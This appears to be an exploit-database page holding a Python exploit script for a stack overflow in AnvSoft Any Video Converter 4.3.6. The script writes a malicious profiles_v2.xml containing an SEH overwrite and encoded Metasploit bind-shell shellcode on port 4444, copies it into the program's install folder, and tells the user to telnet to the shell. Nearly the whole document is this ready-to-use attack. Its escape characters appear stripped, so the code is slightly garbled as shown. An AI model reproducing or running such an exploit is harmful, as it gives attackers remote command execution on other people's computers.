Home / exploits AnvSoft Any Video Converter 4.3.6 Stack Overflow
Posted on 04 May 2012
#!/usr/bin/python # # Exploit Title: AnvSoft Any Video Converter 4.3.6 Stack Overflow # Author: cikumel (@mhx_x) and y0k (@riy0_wid) from @spentera research # Website: http://www.spentera.com # Platform: Windows # Tested on: Windows XP SP3 # Based on POC by Vulnerability-Lab (http://www.exploit-db.com/exploits/18717/) # import os,shutil,time,sys def banner(): print " AnvSoft Any Video Converter 4.3.6 Stack Overflow" print " based on POC by Vulnerability-Lab (www.vulnerability-lab.com)" print " cikumel (@mhx_x) and y0k (@riy0_wid) from @spentera research " print " ---------------------------------------------------- " junk = "x90" * 328 nseh = "xebx06x90x90" seh = "xe4xf3x04x10" # win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com # badchars = "x00x0ax0dx22x26x3e" code = ("xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49" "x49x49x49x49x49x49x49x49x49x49x49x51x48x5ax6ax48" "x58x30x41x30x50x42x6bx42x41x58x41x42x32x42x41x32" "x41x41x30x41x41x58x50x38x42x42x75x59x79x69x6cx30" "x6ax78x6bx32x6dx78x68x4bx49x4bx4fx4bx4fx4bx4fx41" "x70x6cx4bx30x6cx51x34x66x44x6ex6bx72x65x35x6cx6c" "x4bx73x4cx67x75x30x78x67x71x68x6fx4cx4bx50x4fx47" "x68x4ex6bx41x4fx67x50x55x51x7ax4bx42x69x6cx4bx74" "x74x4cx4bx36x61x78x6ex74x71x4bx70x4fx69x6ex4cx4f" "x74x4bx70x70x74x65x57x4ax61x6bx7ax56x6dx47x71x4b" "x72x5ax4bx58x74x35x6bx72x74x75x74x34x68x30x75x4b" "x55x4cx4bx43x6fx57x54x36x61x68x6bx72x46x4ex6bx56" "x6cx30x4bx6ex6bx43x6fx65x4cx67x71x4ax4bx44x43x54" "x6cx4cx4bx6fx79x70x6cx74x64x35x4cx70x61x39x53x57" "x41x69x4bx50x64x6cx4bx47x33x70x30x6cx4bx57x30x76" "x6cx6cx4bx72x50x45x4cx6ex4dx4cx4bx53x70x43x38x63" "x6ex55x38x6cx4ex30x4ex54x4ex78x6cx42x70x69x6fx6e" "x36x53x56x63x63x70x66x33x58x54x73x36x52x53x58x61" "x67x34x33x57x42x41x4fx53x64x39x6fx5ax70x45x38x68" "x4bx7ax4dx39x6cx57x4bx66x30x6bx4fx49x46x63x6fx4b" "x39x79x75x65x36x4fx71x58x6dx47x78x63x32x70x55x73" "x5ax37x72x4bx4fx68x50x70x68x4ex39x74x49x4cx35x4c" "x6dx71x47x4bx4fx4ax76x32x73x63x63x50x53x50x53x31" "x43x52x63x73x63x47x33x33x63x59x6fx4ex30x31x76x30" "x68x77x61x51x4cx31x76x51x43x4dx59x6ax41x6fx65x45" "x38x4fx54x66x7ax50x70x6ax67x66x37x79x6fx6ex36x61" "x7ax64x50x33x61x42x75x69x6fx6ax70x33x58x4cx64x6e" "x4dx56x4ex39x79x73x67x4bx4fx7ax76x72x73x70x55x59" "x6fx58x50x61x78x6ax45x41x59x6dx56x42x69x66x37x4b" "x4fx4ex36x46x30x76x34x31x44x50x55x69x6fx4ex30x6e" "x73x75x38x6bx57x64x39x49x56x43x49x46x37x39x6fx4b" "x66x66x35x39x6fx68x50x75x36x62x4ax43x54x72x46x65" "x38x65x33x70x6dx4fx79x6bx55x32x4ax46x30x46x39x41" "x39x38x4cx4dx59x4dx37x41x7ax52x64x4fx79x6bx52x70" "x31x4bx70x4cx33x4fx5ax49x6ex77x32x76x4dx69x6ex31" "x52x64x6cx4ex73x4ex6dx43x4ax34x78x6ex4bx6ex4bx6c" "x6bx50x68x62x52x4bx4ex78x33x54x56x4bx4fx73x45x32" "x64x39x6fx38x56x61x4bx32x77x43x62x70x51x73x61x71" "x41x63x5ax44x41x31x41x43x61x63x65x56x31x6bx4fx4e" "x30x53x58x4cx6dx5ax79x54x45x58x4ex33x63x4bx4fx6b" "x66x50x6ax39x6fx4bx4fx70x37x4bx4fx38x50x4ex6bx62" "x77x49x6cx4cx43x49x54x43x54x69x6fx5ax76x56x32x79" "x6fx6ex30x50x68x53x4ex6ax78x7ax42x44x33x52x73x39" "x6fx4ex36x79x6fx68x50x48") sisa = "x90" * (1000-len(code)) poc = "<root> " poc+= "<categories> " poc+= "<category name=""+junk+nseh+seh+code+sisa+"" id="0" icon="cat_all.bmp" desc="All Profiles"/> " poc+= "</categories> " poc+= "<groups></groups> <profiles></profiles> </root> " file = "profiles_v2.xml" splash=os.path.abspath(file) profdir="C:Program FilesAnvSoftAny Video Converter Professional" writeFile = open(file, "w") if os.name == 'nt': if os.path.isdir(profdir): try: writeFile.write(poc) banner() print "[*] Creating the malicious",file time.sleep(1) print "[*] Malicious",file,"created.." writeFile.close() shutil.copy2(splash,profdir) print "[*] File",file,"has been copied to",profdir print "[*] Now open AnvSoft program and telnet to port 4444" except IOError: print "[-] Could not write to destination folder, check permission.." sys.exit() else: print "[-] Could not find installation directory, is AnvSoft Any Video Converter installed?" sys.exit() else: print "[-] Please run this script on Windows." sys.exit()
